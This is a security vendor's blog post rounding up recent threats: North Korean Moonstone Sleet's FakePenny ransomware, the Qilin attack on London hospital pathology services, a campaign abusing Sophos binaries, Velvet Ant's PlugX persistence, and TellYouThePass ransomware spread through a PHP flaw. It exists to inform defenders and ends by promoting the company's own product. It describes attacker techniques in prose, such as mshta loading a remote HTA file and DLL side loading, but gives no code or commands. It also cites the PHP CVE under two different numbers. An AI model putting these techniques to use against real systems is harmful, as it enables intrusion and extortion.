Author:
Kaustubh Jagtap, Product Marketing Director, SafeBreach
In this version of the Hacker’s Playbook Threat Coverage round-up, we are highlighting attack coverage for newly discovered or analyzed threats by the SafeBreach Labs team. SafeBreach customers can select and run these attacks and more from the SafeBreach Hacker’s Playbook to ensure coverage against these advanced threats. Additional details about the threats and our coverage can be seen below.
Microsoft Threat Intelligence recently identified a new North Korean threat actor whom they have associated with attacks on individuals and organizations in the software and information technology, education, and defense industrial base sectors. These threat actors, known as Moonstone Sleet (formerly Storm-1789) have been observed using known TTPs (commonly used by other North Korean threat actors) and several unique techniques to achieve their malicious objectives (financial and cyberespionage). Moonstone Sleet is a North Korean state-affiliated threat actor who has been observed using unique techniques and reusing code from Diamond Sleet malware and several of their techniques to gain initial access to victim networks via social media.
According to the researchers, these threat actors were observed setting up fake companies and job opportunities to target and engage with potential targets. They would then employ trojanized versions of legitimate tools, create a fully functional malicious game, and deliver a new custom ransomware (FakePenny Ransomware). This new custom ransomware includes a loader and an encryptor and has been primarily leveraged for intelligence collection and revenue generation. The ransom note that FakePenny left behind is eerily similar to the one that threat actor Seashell Blizzard used to distribute the NotPetya malware.
The SafeBreach platform was updated with the following new attacks to ensure our customers can validate their security controls against this ransomware variant:
A ransomware attack that impacted several major hospitals in London has been formally attributed to the Russian threat group Qilin. This ransomware attack was performed against Synnovis – a partnership between Guy’s and St Thomas’ NHS Foundation Trust and King’s College Hospitals NHS Trust. Investigators believe that the Qilin ransomware gang leveraged the double extortion model to first steal and encrypt data and threaten to publish this data if ransom was not paid. This attack interrupted pathology services across the two hospitals as well as other primary care services across the boroughs of Bexley, Greenwich, Lewisham, Bramley, Southwark, and Lambeth and has been labeled as an ongoing critical incident.
Qilin is a ransomware-as-a-service (RaaS) affiliate program that uses a Rust-based ransomware to target its victims. Most of the attacks executed by Qilin are customized for each targeted victim. Qilin threat actors achieve this customization by changing the filename extensions of encrypted files and terminating specific processes and services. Qilin advertises the ransomware on the dark web and can generate samples for both Windows and ESXi versions.
The SafeBreach platform was updated with the following new attacks to ensure our customers can validate their security controls against this ransomware variant:
Sophos researchers recently stumbled across a new ransomware campaign that abuses legitimate Sophos executables and DLLs by modifying the original content of these DLL libraries and executables and replacing it with a decrypted malicious payload. Based on the initial information available, this affects version 2022.4.3 of Sophos’ Windows Endpoint product.
This was discovered when Sophos’s new C2 interceptor detected and flagged a Brute Ratel C2 connection attempt on a customer network. Further analysis highlighted that the code at the entry point was overwritten by the malicious loader code, and the encrypted payload was stored as a resource within the resources section. Similarly, when the researchers analyzed the Cobalt Strike beacon executable, they identified the TitanLdr loader, a complex multifunction shellcode. Additional details about the campaign can be found on the Sophos website.
The SafeBreach platform was updated with the following new attacks to ensure our customers can validate their security controls against this trojan variant:
Sygnia researchers observed a Chinese state-sponsored threat actor called Velvet Ant conducting espionage operations after successfully establishing persistence in a large organizational network for over three years. This threat actor was able to gain a foothold in the victim network by exploiting 2 legacy F5 BigIP appliances (including a load balancer) whose operating systems were not updated.
The techniques used by Velvet Ant are similar to those used by other Chinese state-sponsored threat actors. Researchers highlighted that Velvet Ant consistently hijacked execution flow by leveraging different methods, such as DLL search order hijacking, Phantom DLL loading, and DLL side loading. During this attack, Velvet Ant leveraged the PlugX malware, a remote access trojan (RAT) that can remain dormant on victim networks for months. PlugX is primarily used to provide remote access to infected victim systems.
The PlugX execution chain in this network consisted of three files: ‘iviewers.exe’, ‘iviewers.dll’ and ‘iviewers.dll.ui’.
When ‘iviewers.exe’ is executed, these three files are copied to a sub-directory with a non-fixed name under ‘C:\ProgramData’ (or ‘C:\Documents and Settings\All Users\Application Data’, on Windows Server 2003 systems), and ‘iviewers.exe’ is installed as a Windows service. Afterwards, several ‘Svchost’ processes are launched, and malicious code is injected into them.
It is important to note that the group’s ability to quickly adapt and pivot between different methods to maintain their foothold is indicative of their ability to continuously refine their techniques to evade detection.
The SafeBreach platform was updated with the following attacks to ensure our customers can validate their security controls against this malware:
Threat researchers from Imperva have identified threat actors leveraging CVE-2024-4577, a PHP vulnerability to deliver malware, including the “TellYouThePass” ransomware. Threat actors used a known exploit for CVE-2024-3577 to execute arbitrary PHP code on the victim network. They did so by leveraging the “system” function to run an HTML application file that was hosted on an attacker-controlled web server via the mshta.exe binary. The use of the “mshta.exe” binary highlights the attackers’ sophistication and their use of “living off the land” techniques.
Upon initial execution, the sample sends an HTTP request to the command-and-control (C2) server containing details about the infected machine as a notification of infection. The callback masquerades as a request to retrieve CSS resources, likely designed to evade detection. The binary then enumerates directories, kills processes, generates encryption keys and encrypts files within each enumerated directory that has a defined file extension. Finally, the malware then publishes a ReadMe message in the web root directory as “READ_ME10.html”, containing the details required to “TellYouThePass”.
The SafeBreach platform was updated with the following attacks to ensure our customers can validate their security controls against this vulnerability:
SafeBreach now offers a complimentary and customized real-world ransomware assessment, RansomwareRx, that allows you to gain unparalleled visibility into how your security ecosystem responds at each stage of the defense process. This ransomware assessment includes:
Empower your team to understand more about ransomware attacks, methodologies, and behaviors—all through the lens of the attacker. Request your complimentary RansomwareRx assessment today.